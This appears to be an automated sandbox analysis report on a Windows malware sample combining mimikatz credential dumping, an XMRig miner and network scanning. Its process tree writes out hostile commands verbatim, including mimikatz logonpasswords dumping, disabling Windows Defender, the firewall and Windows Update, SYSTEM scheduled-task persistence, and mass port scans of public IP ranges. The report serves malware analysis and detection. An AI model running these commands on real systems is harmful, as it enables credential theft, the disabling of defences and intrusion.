Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
15-01-2025 06:29
General
-
Target
2025-01-15_690963aa20b10b49d1015155574670bf_hacktools_icedid_mimikatz.exe
-
Size
9.8MB
-
MD5
690963aa20b10b49d1015155574670bf
-
SHA1
42c5b687dd45a53ee7ff5492b8e92ccbe37be462
-
SHA256
46f4d555ee9bc523540175740dbf7bdd888bb8cbb3cbcccf26677f490170d7f0
-
SHA512
80b0e5dcebf83346579c0c09441f120ec79fc1530380642f5b938bae2250c9899c710e8e631249b4da792d61d79c0b889a054d30d14a98fb650fab8f6e26adcd
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30404) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\genjjusrl\hiukvr.exe"C:\Windows\TEMP\genjjusrl\hiukvr.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-15_690963aa20b10b49d1015155574670bf_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-15_690963aa20b10b49d1015155574670bf_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tpizqeql\fbyqtdq.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\tpizqeql\fbyqtdq.exeC:\Windows\tpizqeql\fbyqtdq.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\tpizqeql\fbyqtdq.exeC:\Windows\tpizqeql\fbyqtdq.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iefblqiiz\bsvlqulnj\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\iefblqiiz\bsvlqulnj\wpcap.exeC:\Windows\iefblqiiz\bsvlqulnj\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iefblqiiz\bsvlqulnj\ipdqsnhqb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iefblqiiz\bsvlqulnj\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\iefblqiiz\bsvlqulnj\ipdqsnhqb.exeC:\Windows\iefblqiiz\bsvlqulnj\ipdqsnhqb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iefblqiiz\bsvlqulnj\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iefblqiiz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\iefblqiiz\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\iefblqiiz\Corporate\vfshost.exeC:\Windows\iefblqiiz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rtvtziebs" /ru system /tr "cmd /c C:\Windows\ime\fbyqtdq.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rtvtziebs" /ru system /tr "cmd /c C:\Windows\ime\fbyqtdq.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ipyqluzlq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ipyqluzlq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lnuuvqibb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lnuuvqibb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 788 C:\Windows\TEMP\iefblqiiz\788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 384 C:\Windows\TEMP\iefblqiiz\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2116 C:\Windows\TEMP\iefblqiiz\2116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2676 C:\Windows\TEMP\iefblqiiz\2676.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2800 C:\Windows\TEMP\iefblqiiz\2800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2896 C:\Windows\TEMP\iefblqiiz\2896.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 692 C:\Windows\TEMP\iefblqiiz\692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3740 C:\Windows\TEMP\iefblqiiz\3740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3832 C:\Windows\TEMP\iefblqiiz\3832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3916 C:\Windows\TEMP\iefblqiiz\3916.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 4012 C:\Windows\TEMP\iefblqiiz\4012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2348 C:\Windows\TEMP\iefblqiiz\2348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3824 C:\Windows\TEMP\iefblqiiz\3824.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2468 C:\Windows\TEMP\iefblqiiz\2468.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2188 C:\Windows\TEMP\iefblqiiz\2188.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 1108 C:\Windows\TEMP\iefblqiiz\1108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 1580 C:\Windows\TEMP\iefblqiiz\1580.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
-
C:\Windows\TEMP\iefblqiiz\ysyinnueq.exeC:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2356 C:\Windows\TEMP\iefblqiiz\2356.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\iefblqiiz\bsvlqulnj\scan.bat2⤵
-
C:\Windows\iefblqiiz\bsvlqulnj\hjrtlerqg.exehjrtlerqg.exe TCP 181.215.0.1 181.215.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\qicmew.exeC:\Windows\SysWOW64\qicmew.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\fbyqtdq.exe1⤵
-
C:\Windows\ime\fbyqtdq.exeC:\Windows\ime\fbyqtdq.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\fbyqtdq.exe1⤵
-
C:\Windows\ime\fbyqtdq.exeC:\Windows\ime\fbyqtdq.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.0MB
MD5db500c5890c69b787b04c903cd943c20
SHA15df02cb6fdcb9e35e6b2a1da4414f50a1bd80ae5
SHA256b2874c92810e5372c46c3cbccb97933d0819e673fd0dd998a17725d120f8af92
SHA5123cd19c45eaf1bef3b539083011956a1656204c7662d9b40712caf19566eb85bced961374d054f65249392fc644f185450248cbc5b2bef1e929c97a18120f66e5
-
Filesize
1.2MB
MD50039f59b8346d234002455888302d244
SHA19f173be03c412d012e1c219d669939651ac9f9a0
SHA256456b4bf8ce9fdc5f6e43e42625204054700a897f113ac12d18c6b829c91302df
SHA5129ac1124ad14eec415315049c6de10c982dace03867e9a9f5c62f908d2525811bb51ba06ec3656e8924e4151afbb9917d9f0602a136160787c7f3f4651ce51587
-
Filesize
8.4MB
MD5f4c29318e407b635b5aa3c3c32a4c6cb
SHA1d076ce3d8b566219dec6dbd78990c76057c091d7
